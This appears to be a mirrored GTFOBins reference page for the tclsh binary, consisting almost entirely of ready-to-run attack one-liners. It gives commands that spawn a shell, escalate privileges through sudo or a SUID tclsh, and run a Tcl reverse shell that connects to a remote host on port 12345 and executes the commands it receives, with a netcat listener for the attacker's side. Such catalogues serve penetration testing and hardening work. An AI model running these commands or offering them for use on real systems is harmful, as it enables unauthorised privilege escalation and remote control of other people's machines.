GTFOBins.github.io/tclsh.md at ac79267e7e0bd3237e5fbb12e226cebc3e8a4ca4

mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2026-01-21 07:11:33 +01:00

Emilio Pinna 0a5168dc9a Replace default port number with 12345

2018-05-23 08:08:13 +01:00

functions

exec-interactive

sudo-enabled

suid-enabled

reverse-shell-non-interactive

code
tclsh exec /bin/sh <@stdin >@stdout 2>@stderr

code
sudo tclsh exec /bin/sh <@stdin >@stdout 2>@stderr

code
./tclsh exec /bin/sh -p <@stdin >@stdout 2>@stderr

description	code
Run `nc -l -p 12345` to receive the shell on the other end.	export RHOST=10.0.0.1 export RPORT=12345 echo 'set s [socket $::env(RHOST) $::env(RPORT)];while 1 { puts -nonewline $s "> ";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' \| tclsh